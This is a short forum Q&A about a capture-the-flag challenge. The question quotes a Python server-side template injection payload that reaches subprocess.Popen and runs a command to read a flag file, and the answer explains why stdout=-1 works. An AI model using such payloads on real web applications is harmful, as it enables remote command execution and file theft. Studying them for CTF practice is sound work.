João Luca
Reputation: 5
Popen stdout value
im doing a ctf challenge about an SSTI. The solution payload is
{{"".__class__.__mro__[1].__subclasses__()[213](['cat','flag.txt'],stdout=-1).communicate()}}
I would like to know why stdout accepts -1 as a value. I could not find it in the current subprocess documentation.
Upvotes: 0
Views: 335
Answers (1)
chepner
Reputation: 531708
-1 is just the value of subprocess.PIPE
PIPE = -1
Given the convoluted nature of getting a reference to Popen in the first place, subprocess.PIPE itself may not be available, so its value is used instead.
Upvotes: 1
Related Questions
- subprocess.Popen() stdout and stderr handling
- Pass input to Popen process
- Python subprocess.Popen does not work with stdout
- subprocess popen stdout
- Reading stdout from Python subprocess
- Work with the stdout of some other process (created with Popen)
- Using POpen to send a variable to Stdin and to send Stdout to a variable
- Python subprocess Popen piping a string to a program
- Reading/writing to a Popen() subprocess
- Python subprocess.Popen stdin interfering with stdout/stderr